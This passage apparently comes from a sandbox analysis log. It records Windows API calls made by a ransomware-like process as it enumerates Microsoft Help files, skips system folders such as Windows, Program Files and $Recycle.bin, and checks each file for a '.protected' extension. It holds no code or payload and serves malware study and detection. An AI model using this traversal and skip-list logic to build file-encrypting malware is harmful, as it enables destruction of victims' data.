lpString2="Program Files (x86)") returned -1 [0093.309] lstrcmpiW (lpString1="Microsoft Help", lpString2="$Recycle.bin") returned 1 [0093.309] lstrcmpiW (lpString1="Microsoft Help", lpString2="System Volume Information") returned -1 [0093.309] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help") returned 37 [0093.309] lstrcmpW (lpString1="Microsoft Help", lpString2=".") returned 1 [0093.309] lstrcmpW (lpString1="Microsoft Help", lpString2="..") returned 1 [0093.309] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*") returned 39 [0093.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0093.309] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.309] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.309] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.309] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.309] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.309] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\.") returned 39 [0093.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.309] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.310] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.310] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.310] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.310] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.310] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.310] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\..") returned 40 [0093.310] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.310] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.310] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.310] lstrcmpiW (lpString1="Hx.hxn.protected", lpString2="Windows") returned -1 [0093.310] lstrcmpiW (lpString1="Hx.hxn.protected", lpString2="Program Files") returned -1 [0093.310] lstrcmpiW (lpString1="Hx.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.310] lstrcmpiW (lpString1="Hx.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.310] lstrcmpiW (lpString1="Hx.hxn.protected", lpString2="System Volume Information") returned -1 [0093.310] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Hx.hxn.protected") returned 54 [0093.310] StrStrIW (lpFirst="Hx.hxn.protected", lpSrch=".protected") returned=".protected" [0093.310] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.310] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.protected") returned 68 [0093.310] StrStrIW (lpFirst="MS.EXCEL.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.310] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.310] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.311] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.311] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.311] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.311] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.311] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.protected") returned 72 [0093.311] StrStrIW (lpFirst="MS.EXCEL.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.311] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.311] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.311] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.311] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.protected") returned 68 [0093.311] StrStrIW (lpFirst="MS.GRAPH.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.311] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.311] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.311] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.311] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.311] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.protected") returned 69 [0093.311] StrStrIW (lpFirst="MS.GROOVE.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.311] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.311] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.protected") returned 71 [0093.311] StrStrIW (lpFirst="MS.INFOPATH.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.311] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.311] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.311] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.protected") returned 77 [0093.312] StrStrIW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.312] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.protected") returned 71 [0093.312] StrStrIW (lpFirst="MS.MSACCESS.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.312] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.protected") returned 75 [0093.312] StrStrIW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.312] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.protected") returned 68 [0093.312] StrStrIW (lpFirst="MS.MSOUC.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.312] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.protected") returned 68 [0093.312] StrStrIW (lpFirst="MS.MSPUB.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.312] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.protected") returned 72 [0093.312] StrStrIW (lpFirst="MS.MSPUB.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.312] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.312] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.protected") returned 69 [0093.313] StrStrIW (lpFirst="MS.MSTORE.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.313] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.protected") returned 66 [0093.313] StrStrIW (lpFirst="MS.OIS.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.313] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.protected") returned 70 [0093.313] StrStrIW (lpFirst="MS.ONENOTE.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.protected") returned 70 [0093.313] StrStrIW (lpFirst="MS.OUTLOOK.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.313] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.protected") returned 74 [0093.313] StrStrIW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.protected") returned 71 [0093.313] StrStrIW (lpFirst="MS.POWERPNT.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.313] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.313] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.protected") returned 75 [0093.314] StrStrIW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.314] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.314] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.314] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.314] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.protected") returned 70 [0093.314] StrStrIW (lpFirst="MS.SETLANG.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.protected") returned 68 [0093.314] StrStrIW (lpFirst="MS.VISIO.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.protected") returned 72 [0093.314] StrStrIW (lpFirst="MS.VISIO.DEV.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.protected") returned 79 [0093.314] StrStrIW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.314] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.314] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.protected") returned 72 [0093.314] StrStrIW (lpFirst="MS.VISIO_PRM.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.314] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.315] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.315] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.315] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.315] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.315] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.315] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.protected") returned 72 [0093.315] StrStrIW (lpFirst="MS.VISIO_STD.14.1033.hxn.protected", lpSrch=".protected") returned=".protected" [0093.315] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.protected", lpString2="Windows") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.protected", lpString2="Program Files") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.protected", lpString2="Program Files (x86)") returned -1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.protected", lpString2="$Recycle.bin") returned 1 [0093.315] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn.protected", lpString2="System Volume Information") returned -1 [0093.315] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft 